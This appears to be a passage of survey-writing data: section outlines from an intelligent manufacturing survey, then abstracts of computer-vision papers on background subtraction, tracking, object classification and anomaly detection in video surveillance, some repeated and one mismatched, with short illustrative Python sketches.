layer Description 7: This section focuses on the network layers necessary for communication, sensing, and business operations within the intelligent manufacturing system. Section 8: Service platform layer Description 8: This section elaborates on the components of the service platform layer, including virtual resources, intelligent support functions, and user interfaces to support intelligent manufacturing. Section 9: Intelligent cloud service application layer Description 9: This section highlights the application modes of intelligent cloud services, emphasizing autonomous processes and human-machine interaction. Section 10: Security management and standard specifications Description 10: This section discusses the importance of security management and standardization in protecting and regulating intelligent manufacturing systems. Section 11: Intelligent manufacturing technology system Description 11: This section outlines the technological components and systems essential for implementing intelligent manufacturing, ranging from general technology to specific life cycle and supporting technologies. Section 12: Evaluation of the application of AI in intelligent manufacturing Description 12: This section provides criteria for evaluating AI applications in intelligent manufacturing, focusing on technology assessment, industry development, and application effects. Section 13: Overseas development Description 13: This section reviews the strategic plans and technological advancements in intelligent manufacturing by developed countries like the US and Germany, highlighting their milestones and demonstrative applications. Section 14: Domestic development Description 14: This section discusses China's strategic initiatives and progress in intelligent manufacturing, emphasizing the need for transforming its manufacturing industry using AI. 
Section 15: Research direction of AI 2.0 in intelligent manufacturing industry Description 15: This section proposes future research directions for integrating AI 2.0 in intelligent manufacturing, focusing on application technologies, industry development, and typical paradigms. Section 16: Application technologies of intelligent manufacturing Description 16: This section outlines specific intelligent manufacturing application technologies, focusing on system frameworks, platform technologies, and key life cycle activities. Section 17: Development of the intelligent manufacturing industry Description 17: This section discusses research directions in developing intelligent products, industrial tools, and multi-layer intelligent manufacturing systems. Section 18: Typical paradigms of intelligent manufacturing Description 18: This section highlights various demonstration paradigms in intelligent manufacturing, including model-driven collaboration, cloud services, intelligent workshops, and autonomous manufacturing units.
A Survey Of Activity Recognition And Understanding The Behavior In Video Surveillance
7
--- paper_title: Statistical Background Modeling: An Edge Segment Based Moving Object Detection Approach paper_content: We propose an edge segment based statistical background modeling algorithm and a moving edge detection framework for the detection of moving objects. We analyze the performance of the proposed segment based statistical background model with traditional pixel based, edge pixel based and edge segment based approaches. Existing edge based moving object detection algorithms fetches difficulty due to the change in background motion, object shape, illumination variation and noise. The proposed algorithm makes efficient use of statistical background model using the edge-segment structure. Experiments with natural image sequences show that our method can detect moving objects efficiently under the above mentioned environments. --- paper_title: Adaptive mean-shift for automated multi object tracking paper_content: Mean-shift tracking plays an important role in computer vision applications because of its robustness, ease of implementation and computational efficiency. In this study, a fully automatic multiple-object tracker based on mean-shift algorithm is presented. Foreground is extracted using a mixture of Gaussian followed by shadow and noise removal to initialise the object trackers and also used as a kernel mask to make the system more efficient by decreasing the search area and the number of iterations to converge for the new location of the object. By using foreground detection, new objects entering to the field of view and objects that are leaving the scene could be detected. Trackers are automatically refreshed to solve the potential problems that may occur because of the changes in objects' size, shape, to handle occlusion-split between the tracked objects and to detect newly emerging objects as well as objects that leave the scene. Using a shadow removal method increases the tracking accuracy. As a result, a method that remedies problems of mean-shift tracking and presents an easy to implement, robust and efficient tracking method that can be used for automated static camera video surveillance applications is proposed. Additionally, it is shown that the proposed method is superior to the standard mean-shift. --- paper_title: Bayesian visual surveillance: A model for detecting and tracking a variable number of moving objects paper_content: An automatic detection and tracking framework for visual surveillance is proposed, which is able to handle a variable number of moving objects. Video object detectors generate an unordered set of noisy, false, missing, split, and merged measurements that make extremely complex the tracking task. Especially challenging are split detections (one object is split into several measurements) and merged detections (several objects are merged into one detection). Few approaches address this problem directly, and the existing ones use heuristics methods, or assume a known number of objects, or are not suitable for on-line applications. In this paper, a Bayesian Visual Surveillance Model is proposed that is able to manage undesirable measurements. Particularly, split and merged measurements are explicitly modeled by stochastic processes. Inference is accurately performed through a particle filtering approach that combines ancestral and MCMC sampling. Experimental results have shown a high performance of the proposed approach in real situations. 
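The adaptive mean-shift tracker summarized above slides a search window to the mode of a per-pixel likelihood (for example, a histogram back-projection of the target model, masked by the detected foreground). The fragment below is a minimal, hypothetical sketch of that localization step only; the kernel weighting, model refresh and occlusion handling of the actual tracker are not reproduced.

import numpy as np

# Hedged sketch of one mean-shift localization pass, not the full tracker:
# 'weights' is a per-pixel score image (e.g. a histogram back-projection of
# the target model), and the search window moves to its weighted centroid
# until the shift vanishes.
def mean_shift(weights, window, max_iter=20):
    x, y, w, h = window                       # top-left corner plus size
    for _ in range(max_iter):
        roi = weights[y:y + h, x:x + w]
        total = roi.sum()
        if total <= 0:
            break                             # no target evidence in the window
        ys, xs = np.mgrid[0:h, 0:w]
        cx = (roi * xs).sum() / total         # centroid inside the window
        cy = (roi * ys).sum() / total
        dx = int(round(cx - (w - 1) / 2.0))   # shift of the window center
        dy = int(round(cy - (h - 1) / 2.0))
        if dx == 0 and dy == 0:
            break                             # converged
        x = int(np.clip(x + dx, 0, weights.shape[1] - w))
        y = int(np.clip(y + dy, 0, weights.shape[0] - h))
    return (x, y, w, h)

# toy usage: a blob of weight around columns 60-80, rows 35-50 pulls the window
W = np.zeros((120, 160))
W[35:50, 60:80] = 1.0
print(mean_shift(W, window=(50, 25, 30, 30)))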
--- paper_title: Multi-Feature Fusion Based Object Detecting and Tracking paper_content: A new approach is proposed to detect and track the moving object. The affine motion model and the non-parameter distribution model are utilized to represent the object firstly. Then the motion region of the object is detected by background difference while Kalman filter estimating its affine motion in next frame. Center association and mean shift are adopted to obtain the observation values. Finally, the distance variance and scale variance between the estimated and detected regions are used to fuse the observation values to acquire the measurement value. To correct fusion errors, the observable edges are employed. Experimental results show that the new method can successfully track the object under such case as merging, splitting, scale variation and scene noise. --- paper_title: Keynote talk 4: Automated understanding of video object events in a distributed smart camera network paper_content: Summary form only given. You may think that your requirements engineering process is fairly limited and currently not too complex to manage. Or you may be right in the middle of a storm of requirements where it is impossible to manage even the most important ones comprehensively. If you are in the former situation, it may be dangerous to relax as many successful software-intensive products have a tendency to grow very rapidly in size and complexity, and sooner than you might think you may be hit by a massive flood of feature requests and too few resources to prevent the flood from drowning your development organization, which in turn put your future innovation capability and competitiveness at risk. --- paper_title: Real-time Object Classification in Video Surveillance Based on Appearance Learning paper_content: Classifying moving objects to semantically meaningful categories is important for automatic visual surveillance. However, this is a challenging problem due to the factors related to the limited object size, large intra-class variations of objects in a same class owing to different viewing angles and lighting, and real-time performance requirement in real-world applications. This paper describes an appearance-based method to achieve real-time and robust objects classification in diverse camera viewing angles. A new descriptor, i.e., the multi-block local binary pattern (MB-LBP), is proposed to capture the large-scale structures in object appearances. Based on MB-LBP features, an adaBoost algorithm is introduced to select a subset of discriminative features as well as construct the strong two-class classifier. To deal with the non-metric feature value of MB-LBP features, a multi-branch regression tree is developed as the weak classifiers of the boosting. Finally, the error correcting output code (ECOC) is introduced to achieve robust multi-class classification performance. Experimental results show that our approach can achieve real-time and robust object classification in diverse scenes. --- paper_title: ViBe: A Universal Background Subtraction Algorithm for Video Sequences paper_content: This paper presents a technique for motion detection that incorporates several innovative mechanisms. For example, our proposed technique stores, for each pixel, a set of values taken in the past at the same location or in the neighborhood. 
It then compares this set to the current pixel value in order to determine whether that pixel belongs to the background, and adapts the model by choosing randomly which values to substitute from the background model. This approach differs from those based upon the classical belief that the oldest values should be replaced first. Finally, when the pixel is found to be part of the background, its value is propagated into the background model of a neighboring pixel. We describe our method in full details (including pseudo-code and the parameter values used) and compare it to other background subtraction techniques. Efficiency figures show that our method outperforms recent and proven state-of-the-art methods in terms of both computation speed and detection rate. We also analyze the performance of a downscaled version of our algorithm to the absolute minimum of one comparison and one byte of memory per pixel. It appears that even such a simplified version of our algorithm performs better than mainstream techniques. --- paper_title: Automatic Reasoning about Causal Events in Surveillance Video paper_content: We present a new method for explaining causal interactions among people in video. The input to the overall system is video in which people are low/medium resolution. We extract and maintain a set of qualitative descriptions of single-person activity using the low-level vision techniques of spatiotemporal action recognition and gaze-direction approximation. This models the input to the "sensors" of the person agent in the scene and is a general sensing strategy for a person agent in a variety of application domains. The information subsequently available to the reasoning process is deliberately limited to model what an agent would actually be able to sense. The reasoning is therefore not a classical "all-knowing" strategy but uses these "sensed" facts obtained from the agents, combined with generic domain knowledge, to generate causal explanations of interactions. We present results from urban surveillance video. --- paper_title: Shape Based Object Classification for Automated Video Surveillance with Feature Selection paper_content: Object classification based on shape features for video surveillance has been a research problem for number of years. The object classification accuracy depends on the type of classifier and the extracted object features used for classification. Excellent classification accuracy can be obtained with an appropriate combination of the extracted features with a particular classifier. In this paper, we propose to use an online feature selection method which gives a good subset of features while the machine learns the classification task and use these selected features for object classification. This paper also explores the impact of different kinds of shape features on the object classification accuracy and the performance of different classifiers in a typical automated video surveillance application. --- paper_title: Online EM Algorithm for Background Subtraction paper_content: Abstract Gaussian mixture model is a popular model in background subtraction and efficient equations have been derived to update GMM parameters previously. In order to compute parameters more accurately while maintain constant computing time per frame, we apply online EM algorithm to update the parameters of Gaussian mixture models. To avoid computing the inverse of covariance matrix, we use isotropic matrix and the corresponding incremental EM equations are derived. 
Experiments demonstrate that online EM algorithm can give more accurate segment result than previous update equations. --- paper_title: Proposed framework of Intelligent Video Automatic Target Recognition System (IVATRs) paper_content: In this paper we have introduce a novel hybrid method framework for feature extraction using genetic algorithms in Automatic Target Recognition. In this paper we have given a complete framework and approach for making the system of Automatic Target Recognition System we suggest the name of IVATRs (Intelligent Video Automatic Target Recognition System). This framework will be helpful for making a bridge between the theoretical models of AI techniques and their implementations with hardware. During this study our objective is to design a hybrid mechanism for the currently existing ATRs techniques. This study will also lead us to the result of predicting the behavior of targeted objects and future machines. --- paper_title: Multiple Camera Tracking of Interacting and Occluded Human Motion paper_content: We propose a distributed, real-time computing platform for tracking multiple interacting persons in motion. To combat the negative effects of occlusion and articulated motion we use a multiview implementation, where each view is first independently processed on a dedicated processor. This monocular processing uses a predictor-corrector filter to weigh reprojections of three-dimensional (3-D) position estimates, obtained by the central processor, against observations of measurable image motion. The corrected state vectors from each view provide input observations to a Bayesian belief network, in the central processor, with a dynamic, multidimensional topology that varies as a function of scene content and feature confidence. The Bayesian net fuses independent observations from multiple cameras by iteratively resolving independency relationships and confidence levels within the graph, thereby producing the most likely vector of 3-D state estimates given the available data. To maintain temporal continuity, we follow the network with a layer of Kalman filtering that updates the 3-D state estimates. We demonstrate the efficacy of the proposed system using a multiview sequence of several people in motion. Our experiments suggest that, when compared with data fusion based on averaging, the proposed technique yields a noticeable improvement in tracking accuracy. --- paper_title: Image change detection algorithms: a systematic survey paper_content: Detecting regions of change in multiple images of the same scene taken at different times is of widespread interest due to a large number of applications in diverse disciplines, including remote sensing, surveillance, medical diagnosis and treatment, civil infrastructure, and underwater sensing. This paper presents a systematic survey of the common processing steps and core decision rules in modern change detection algorithms, including significance and hypothesis testing, predictive models, the shading model, and background modeling. We also discuss important preprocessing methods, approaches to enforcing the consistency of the change mask, and principles for evaluating and comparing the performance of change detection algorithms. It is hoped that our classification of algorithms into a relatively small number of categories will provide useful guidance to the algorithm designer. 
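Several of the abstracts above (the mixture-of-Gaussians and online-EM methods in particular) rely on per-pixel statistical background models. As a simplified, hedged stand-in, the sketch below keeps a single Gaussian per pixel with an exponential-forgetting update and flags pixels whose squared deviation exceeds k standard deviations; the learning rate alpha and the threshold k are hypothetical values, and a full mixture model would maintain several weighted components per pixel.

import numpy as np

# Hedged, deliberately simplified stand-in for MoG / online-EM background
# models: one Gaussian per pixel with exponential forgetting. alpha and k
# are hypothetical parameters.
class SingleGaussianBackground:
    def __init__(self, first_frame, alpha=0.01, k=2.5, init_var=15.0 ** 2):
        self.mean = first_frame.astype(np.float64)
        self.var = np.full(first_frame.shape, init_var)
        self.alpha, self.k = alpha, k

    def apply(self, frame):
        frame = frame.astype(np.float64)
        diff = frame - self.mean
        foreground = diff ** 2 > (self.k ** 2) * self.var
        bg = ~foreground                      # adapt the model only where it matched
        self.mean[bg] += self.alpha * diff[bg]
        self.var[bg] = (1 - self.alpha) * self.var[bg] + self.alpha * diff[bg] ** 2
        return foreground

# toy usage with synthetic grayscale frames
rng = np.random.default_rng(1)
frame0 = rng.normal(100.0, 5.0, size=(48, 64))
model = SingleGaussianBackground(frame0)
frame1 = frame0 + rng.normal(0.0, 5.0, size=frame0.shape)
frame1[20:30, 30:40] += 80.0                  # a bright object enters the scene
print("foreground pixels:", int(model.apply(frame1).sum()))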
--- paper_title: Dynamic Background Subtraction Using Spatial-Color Binary Patterns paper_content: In this paper, an efficient approach for background modeling and subtraction is proposed. It's based on a novel spatial-color feature extraction operator named spatial-color binary patterns(SCBP). As the name implies, features extracted by this operator include spatial texture and color information. In addition, a refine module is designed to refine the contour of moving objects. Using the proposed method, we improve the accuracy of subtracting the background and detecting moving objects in dynamic scenes. A data-driven model is used in our method. For each pixel, first, a histogram of SCBP is extracted from the circular egion, and then a model consist of several histograms is built. For a new observed frame, each pixel is labeled either background or foreground according to the matching degree between its SCBP histogram and its model, then the label is refined and finally the model of this pixel is updated. The proposed pproach is tested on challenging video sequences, which shows that the proposed method performs much better than several texture-based methods. --- paper_title: Statistical Background Modeling: An Edge Segment Based Moving Object Detection Approach paper_content: We propose an edge segment based statistical background modeling algorithm and a moving edge detection framework for the detection of moving objects. We analyze the performance of the proposed segment based statistical background model with traditional pixel based, edge pixel based and edge segment based approaches. Existing edge based moving object detection algorithms fetches difficulty due to the change in background motion, object shape, illumination variation and noise. The proposed algorithm makes efficient use of statistical background model using the edge-segment structure. Experiments with natural image sequences show that our method can detect moving objects efficiently under the above mentioned environments. --- paper_title: Research on GMM Background Modeling and its Covariance Estimation paper_content: This paper analyzes the background modeling mechanism using Gaussian mixture model and the stability /plasticity dilemma in parameters estimation of GMM background model. To solve the slow convergence problem of Gaussian mean and covariance update formula given by Stauffer, a new updating strategy is proposed, which weighs the model adaptability and motion segmentation accuracy. Experiments show that the proposed algorithm improves the accuracy of modal learning and speed of covariance convergence. --- paper_title: Review and evaluation of commonly-implemented background subtraction algorithms paper_content: Locating moving objects in a video sequence is the first step of many computer vision applications. Among the various motion-detection techniques, background subtraction methods are commonly implemented, especially for applications relying on a fixed camera. Since the basic inter-frame difference with global threshold is often a too simplistic method, more elaborate (and often probabilistic) methods have been proposed. These methods often aim at making the detection process more robust to noise, background motion and camera jitter. In this paper, we present commonly-implemented background subtraction algorithms and we evaluate them quantitatively. 
In order to gauge performances of each method, tests are performed on a wide range of real, synthetic and semi-synthetic video sequences representing different challenges. --- paper_title: Real-time background subtraction for video surveillance: From research to reality paper_content: This paper reviews and evaluates performance of few common background subtraction algorithms which are median-based, Gaussian-based and Kernel density-based approaches. These algorithms are tested using four sets of image sequences contributed by Wallflower datasets. They are the image sequences of different challenging environments that may reflect the real scenario in video surveillances. The performances of these approaches are evaluated in terms of processing speed, memory usage as well as object segmentation accuracy. The results demonstrate that Gaussian-based approach is the best approach for real-time applications, compromising between accuracy and computational time. Besides, this paper may provide a better understanding of algorithm behaviours implemented in different situations for real-time video surveillance applications. --- paper_title: ViBe: A Universal Background Subtraction Algorithm for Video Sequences paper_content: This paper presents a technique for motion detection that incorporates several innovative mechanisms. For example, our proposed technique stores, for each pixel, a set of values taken in the past at the same location or in the neighborhood. It then compares this set to the current pixel value in order to determine whether that pixel belongs to the background, and adapts the model by choosing randomly which values to substitute from the background model. This approach differs from those based upon the classical belief that the oldest values should be replaced first. Finally, when the pixel is found to be part of the background, its value is propagated into the background model of a neighboring pixel. We describe our method in full details (including pseudo-code and the parameter values used) and compare it to other background subtraction techniques. Efficiency figures show that our method outperforms recent and proven state-of-the-art methods in terms of both computation speed and detection rate. We also analyze the performance of a downscaled version of our algorithm to the absolute minimum of one comparison and one byte of memory per pixel. It appears that even such a simplified version of our algorithm performs better than mainstream techniques. --- paper_title: Moving object detection in spatial domain using background removal techniques -- State-of-art paper_content: Identifying moving objects is a critical task for many computer vision applications; it provides a classification of the pixels into either foreground or background. A common approach used to achieve such classification is background removal. Even though there exist numerous background removal algorithms in the literature, most of them follow a simple flow diagram, passing through four major steps, which are pre-processing, background modelling, foreground detection and data validation. In this paper, we survey many existing schemes in the literature of background removal, surveying the common pre-processing algorithms used in different situations, presenting different background models, and the most commonly used ways to update such models and how they can be initialized.
We also survey how to measure the performance of any moving object detection algorithm, whether the ground truth data is available or not, presenting performance metrics commonly used in both cases. --- paper_title: Multiclass object classification for real-time video surveillance systems paper_content: Object classification in video is an important factor for improving the reliability of various automatic applications in video surveillance systems, as well as a fundamental feature for advanced applications, such as scene understanding. Despite extensive research, existing methods exhibit relatively moderate classification accuracy when tested on a large variety of real-world scenarios, or do not obey the real-time constraints of video surveillance systems. Moreover, their performance is further degraded in multi-class classification problems. We explore multi-class object classification for real-time video surveillance systems and propose an approach for classifying objects in both low and high resolution images (human height varies from a few to tens of pixels) in varied real-world scenarios. Firstly, we present several features that jointly leverage the distinction between various classes. Secondly, we provide a feature-selection procedure based on entropy gain, which screens out superfluous features. Experiments, using various classification techniques, were performed on a large and varied database consisting of ~29,000 object instances extracted from 140 different real-world indoor and outdoor, near-field and far-field scenes having various camera viewpoints, which capture a large variety of object appearances under real-world environmental conditions. The insight raised from the experiments is threefold: the efficiency of our feature set in discriminating between classes, the performance improvement when using the feature selection method, and the high classification accuracy obtained on our real-time system on both DSP (TMS320C6415-6E3, 600MHz) and PC (Quad Core Intel(R) Xeon(R) E5310, 2x4MB Cache, 1.60GHz, 1066MHz) platforms. --- paper_title: Real-time Object Classification in Video Surveillance Based on Appearance Learning paper_content: Classifying moving objects to semantically meaningful categories is important for automatic visual surveillance. However, this is a challenging problem due to the factors related to the limited object size, large intra-class variations of objects in a same class owing to different viewing angles and lighting, and real-time performance requirement in real-world applications. This paper describes an appearance-based method to achieve real-time and robust objects classification in diverse camera viewing angles. A new descriptor, i.e., the multi-block local binary pattern (MB-LBP), is proposed to capture the large-scale structures in object appearances. Based on MB-LBP features, an adaBoost algorithm is introduced to select a subset of discriminative features as well as construct the strong two-class classifier. To deal with the non-metric feature value of MB-LBP features, a multi-branch regression tree is developed as the weak classifiers of the boosting. Finally, the error correcting output code (ECOC) is introduced to achieve robust multi-class classification performance. Experimental results show that our approach can achieve real-time and robust object classification in diverse scenes.
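The MB-LBP descriptor in the preceding abstract extends the classical local binary pattern from single pixels to averaged rectangular blocks. The sketch below shows only the basic 3x3 LBP code and its normalized 256-bin histogram, as a hedged illustration of the underlying texture coding; it is not the multi-block variant, the boosting stage, or the ECOC multi-class scheme described in the paper.

import numpy as np

# Hedged sketch: basic 3x3 local binary pattern and its 256-bin histogram.
def lbp_codes(img):
    img = img.astype(np.float64)
    center = img[1:-1, 1:-1]
    offsets = [(-1, -1), (-1, 0), (-1, 1), (0, 1),
               (1, 1), (1, 0), (1, -1), (0, -1)]      # clockwise neighbors
    codes = np.zeros(center.shape, dtype=np.int32)
    h, w = img.shape
    for bit, (dy, dx) in enumerate(offsets):
        neighbor = img[1 + dy:h - 1 + dy, 1 + dx:w - 1 + dx]
        codes += (neighbor >= center).astype(np.int32) << bit
    return codes

def lbp_histogram(img):
    hist = np.bincount(lbp_codes(img).ravel(), minlength=256).astype(np.float64)
    return hist / hist.sum()                          # normalized texture descriptor

rng = np.random.default_rng(0)
patch = rng.integers(0, 256, size=(32, 32))
print("first bins:", np.round(lbp_histogram(patch)[:8], 4))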
--- paper_title: Shape Based Object Classification for Automated Video Surveillance with Feature Selection paper_content: Object classification based on shape features for video surveillance has been a research problem for number of years. The object classification accuracy depends on the type of classifier and the extracted object features used for classification. Excellent classification accuracy can be obtained with an appropriate combination of the extracted features with a particular classifier. In this paper, we propose to use an online feature selection method which gives a good subset of features while the machine learns the classification task and use these selected features for object classification. This paper also explores the impact of different kinds of shape features on the object classification accuracy and the performance of different classifiers in a typical automated video surveillance application. --- paper_title: Adaptive mean-shift for automated multi object tracking paper_content: Mean-shift tracking plays an important role in computer vision applications because of its robustness, ease of implementation and computational efficiency. In this study, a fully automatic multiple-object tracker based on mean-shift algorithm is presented. Foreground is extracted using a mixture of Gaussian followed by shadow and noise removal to initialise the object trackers and also used as a kernel mask to make the system more efficient by decreasing the search area and the number of iterations to converge for the new location of the object. By using foreground detection, new objects entering to the field of view and objects that are leaving the scene could be detected. Trackers are automatically refreshed to solve the potential problems that may occur because of the changes in objects' size, shape, to handle occlusion-split between the tracked objects and to detect newly emerging objects as well as objects that leave the scene. Using a shadow removal method increases the tracking accuracy. As a result, a method that remedies problems of mean-shift tracking and presents an easy to implement, robust and efficient tracking method that can be used for automated static camera video surveillance applications is proposed. Additionally, it is shown that the proposed method is superior to the standard mean-shift. --- paper_title: Bayesian visual surveillance: A model for detecting and tracking a variable number of moving objects paper_content: An automatic detection and tracking framework for visual surveillance is proposed, which is able to handle a variable number of moving objects. Video object detectors generate an unordered set of noisy, false, missing, split, and merged measurements that make extremely complex the tracking task. Especially challenging are split detections (one object is split into several measurements) and merged detections (several objects are merged into one detection). Few approaches address this problem directly, and the existing ones use heuristics methods, or assume a known number of objects, or are not suitable for on-line applications. In this paper, a Bayesian Visual Surveillance Model is proposed that is able to manage undesirable measurements. Particularly, split and merged measurements are explicitly modeled by stochastic processes. Inference is accurately performed through a particle filtering approach that combines ancestral and MCMC sampling. Experimental results have shown a high performance of the proposed approach in real situations. 
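The shape-based classification work summarized above feeds simple silhouette features to a classifier and selects among them online. As a rough, hypothetical illustration of what such features look like, the fragment below computes area, aspect ratio, bounding-box extent and compactness from a binary blob mask; the actual feature set and the online feature-selection procedure in the cited paper differ.

import numpy as np

# Rough, hypothetical silhouette shape features of the general kind used by
# shape-based object classifiers.
def shape_features(mask):
    mask = mask.astype(bool)
    ys, xs = np.nonzero(mask)
    area = float(mask.sum())
    h = ys.max() - ys.min() + 1
    w = xs.max() - xs.min() + 1
    padded = np.pad(mask, 1)
    # crude perimeter: foreground pixels with at least one background 4-neighbor
    interior = (padded[1:-1, 1:-1] & padded[:-2, 1:-1] & padded[2:, 1:-1]
                & padded[1:-1, :-2] & padded[1:-1, 2:])
    perimeter = float(area - interior.sum())
    return {
        "area": area,
        "aspect_ratio": w / h,                 # people tend to be tall, vehicles wide
        "extent": area / float(w * h),         # bounding-box fill ratio
        "compactness": perimeter ** 2 / (4.0 * np.pi * area),
    }

blob = np.zeros((40, 40), dtype=np.uint8)
blob[5:35, 15:25] = 1                          # a tall, thin blob
print(shape_features(blob))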
--- paper_title: Multi-Feature Fusion Based Object Detecting and Tracking paper_content: A new approach is proposed to detect and track the moving object. The affine motion model and the non-parameter distribution model are utilized to represent the object firstly. Then the motion region of the object is detected by background difference while Kalman filter estimating its affine motion in next frame. Center association and mean shift are adopted to obtain the observation values. Finally, the distance variance and scale variance between the estimated and detected regions are used to fuse the observation values to acquire the measurement value. To correct fusion errors, the observable edges are employed. Experimental results show that the new method can successfully track the object under such case as merging, splitting, scale variation and scene noise. --- paper_title: Object Tracking and Detecting Based on Adaptive Background Subtraction paper_content: Abstract A tracking algorithm based on adaptive background subtraction about the video detecting and tracking moving objects is presented in this paper. Firstly, we use median filter to achieve the background image of the video and denoise the sequence of video. Then we use adaptive background subtraction algorithm to detect and track the moving objects. Adaptive background updating is also realized in this paper. Finally, we improve the accuracy of tracking through open operation. The simulation results by MATLAB show that the adaptive background subtraction is useful in both detecting and tracking moving objects, and background subtraction algorithm runs more quickly. --- paper_title: Object tracking by detection for video surveillance systems based on modified codebook foreground detection and particle filter paper_content: In this paper, a novel approach is proposed to achieve the multi-object tracking in video surveillance system using a combination of tracking by detection method. For the foreground objects detection part, we implement a modified codebook model. First, the block-based model upgrades the pixel-based codebook model to block level, thus improving the processing speed and reducing memory. Moreover, by adding the orientation and magnitude of the block gradient, the codebook model contains not only information of color, but also the texture feature in order to further reduce noises and refine more entire foreground regions. For the tracking aspect, we further utilize the data from the foreground detection that a color-edgetexture histogram is used by calculate the local binary pattern of the edge of the foreground objects which could have a good performance in describing the shape and texture of the objects. Finally, occlusion solutions strategies are applies to order to overcome the occlusion problems during tracking. Experimental results on different data sets prove that our method has better performance and good real-time ability. --- paper_title: Tracking Pedestrians Using Local Spatio-Temporal Motion Patterns in Extremely Crowded Scenes paper_content: Tracking pedestrians is a vital component of many computer vision applications, including surveillance, scene understanding, and behavior analysis. Videos of crowded scenes present significant challenges to tracking due to the large number of pedestrians and the frequent partial occlusions that they produce. 
The movement of each pedestrian, however, contributes to the overall crowd motion (i.e., the collective motions of the scene's constituents over the entire video) that exhibits an underlying spatially and temporally varying structured pattern. In this paper, we present a novel Bayesian framework for tracking pedestrians in videos of crowded scenes using a space-time model of the crowd motion. We represent the crowd motion with a collection of hidden Markov models trained on local spatio-temporal motion patterns, i.e., the motion patterns exhibited by pedestrians as they move through local space-time regions of the video. Using this unique representation, we predict the next local spatio-temporal motion pattern a tracked pedestrian will exhibit based on the observed frames of the video. We then use this prediction as a prior for tracking the movement of an individual in videos of extremely crowded scenes. We show that our approach of leveraging the crowd motion enables tracking in videos of complex scenes that present unique difficulty to other approaches. --- paper_title: Research on Detection and Tracking of Moving Target in Intelligent Video Surveillance paper_content: Now the visual surveillance system has been studied extensively, and has made great progress, but many surveillance systems are only applied in specific sites, and the level of intelligence is not high. Intelligent video surveillance system mainly carries out research on techniques of detection and tracking of moving targets, which are very important for detection and understanding of abnormal behaviors, so the effect of moving detection directly affects the overall effect of video surveillance systems, moving detection of intelligent visual surveillance is mainly target classification, tracking, detection, behavior recognition and so on. Detection and tracking of moving targets in surveillance applications has greatly improved intelligence, accuracy and reliability of video surveillance and has greatly reduced the burden on staff. --- paper_title: Automatic human activity recognition in video using background modeling and spatio-temporal template matching based technique paper_content: Human activity recognition is a challenging area of research because of its various potential applications in visual surveillance. A spatio-temporal template matching based approach for activity recognition is proposed in this paper. We model the background in a scene using a simple statistical model and extract the foreground objects in a scene. Spatio-temporal templates are constructed using the motion history images (MHI) and object shape information for different human activities in a video like walking, standing, bending, sleeping and jumping. Experimental results show that the method can recognize these multiple activities for multiple objects with accuracy and speed. --- paper_title: Eigenspace-based fall detection and activity recognition from motion templates and machine learning paper_content: Automatic recognition of anomalous human activities and falls in an indoor setting from video sequences could be an enabling technology for low-cost, home-based health care systems. Detection systems based upon intelligent computer vision software can greatly reduce the costs and inconveniences associated with sensor based systems. 
In this paper, we propose such a software based upon a spatio-temporal motion representation, called Motion Vector Flow Instance (MVFI) templates, that capture relevant velocity information by extracting the dense optical flow from video sequences of human actions. Automatic recognition is achieved by first projecting each human action video sequence, consisting of approximately 100 images, into a canonical eigenspace, and then performing supervised learning to train multiple actions from a large video database. We show that our representation together with a canonical transformation with PCA and LDA of image sequences provides excellent action discrimination. We also demonstrate that by including both the magnitude and direction of the velocity into the MVFI, sequences with abrupt velocities, such as falls, can be distinguished from other daily human action with both high accuracy and computational efficiency. As an added benefit, we demonstrate that, once trained, our method for detecting falls is robust and we can attain real-time performance. --- paper_title: Event detection and recognition using histogram of oriented gradients and hidden markov models paper_content: This paper presents an approach for object detection and event recognition in video surveillance scenarios. The proposed system utilizes a Histogram of Oriented Gradients (HOG) method for object detection, and a Hidden Markov Model (HMM) for capturing the temporal structure of the features. Decision making is based on the understanding of objects motion trajectory and the relationships between objects' movement and events. The proposed method is applied to recognize events from the public PETS and i-LIDS datasets, which include vehicle events such as U-turns and illegal parking, as well as abandoned luggage recognition established by set of rules. The effectiveness of the proposed solution is demonstrated through extensive experimentation. --- paper_title: A Context Space Model for Detecting Anomalous Behaviour in Video Surveillance paper_content: Having a good automatic anomalous human behaviour ::: detection is one of the goals of smart surveillance ::: systems’ domain of research. The automatic detection addresses several human factor issues underlying the existing surveillance systems. To create such a detection system, contextual information needs to be considered. This is because context is required in order to correctly understand human behaviour. Unfortunately, the use of contextual information is still limited in the automatic anomalous human behaviour detection approaches. This paper proposes a context space model which has two benefits: (a) It provides guidelines for the system designers to select information which can be used to describe context; (b)It enables a system to distinguish between different contexts. A comparative analysis is conducted between a context-based system which employs the proposed context space model and a system which is implemented based on one of the existing approaches. The comparison is applied on a scenario constructed using video clips from CAVIAR dataset. The results show that the context-based system outperforms the other system. This is because the context space model allows the system to considering knowledge learned from the relevant context only. 
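The activity-recognition abstracts above build spatio-temporal templates such as motion history images (MHI). The following hedged sketch shows the basic MHI update: pixels with fresh frame-to-frame motion are stamped with a maximum duration value and all other pixels decay, so the template encodes where and how recently motion occurred. The duration tau and the motion threshold are hypothetical parameters, and the shape cues and template matching of the cited methods are not included.

import numpy as np

# Hedged sketch of a motion history image (MHI) update.
def update_mhi(mhi, prev_frame, frame, tau=30.0, motion_thresh=25):
    diff = np.abs(frame.astype(np.int32) - prev_frame.astype(np.int32))
    moving = diff > motion_thresh
    return np.where(moving, tau, np.maximum(mhi - 1.0, 0.0))

# toy usage: a small object shifts one column to the right between frames
f0 = np.zeros((32, 32), dtype=np.uint8); f0[10:20, 5:10] = 255
f1 = np.zeros((32, 32), dtype=np.uint8); f1[10:20, 6:11] = 255
mhi = np.zeros((32, 32))
mhi = update_mhi(mhi, f0, f1)
print("pixels with fresh motion:", int((mhi == 30.0).sum()))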
--- paper_title: Video Behavior Profiling for Anomaly Detection paper_content: This paper aims to address the problem of modeling video behavior captured in surveillance videos for the applications of online normal behavior recognition and anomaly detection. A novel framework is developed for automatic behavior profiling and online anomaly sampling/detection without any manual labeling of the training data set. The framework consists of the following key components: 1) A compact and effective behavior representation method is developed based on discrete-scene event detection. The similarity between behavior patterns are measured based on modeling each pattern using a Dynamic Bayesian Network (DBN). 2) The natural grouping of behavior patterns is discovered through a novel spectral clustering algorithm with unsupervised model selection and feature selection on the eigenvectors of a normalized affinity matrix. 3) A composite generative behavior model is constructed that is capable of generalizing from a small training set to accommodate variations in unseen normal behavior patterns. 4) A runtime accumulative anomaly measure is introduced to detect abnormal behavior, whereas normal behavior patterns are recognized when sufficient visual evidence has become available based on an online Likelihood Ratio Test (LRT) method. This ensures robust and reliable anomaly detection and normal behavior recognition at the shortest possible time. The effectiveness and robustness of our approach is demonstrated through experiments using noisy and sparse data sets collected from both indoor and outdoor surveillance scenarios. In 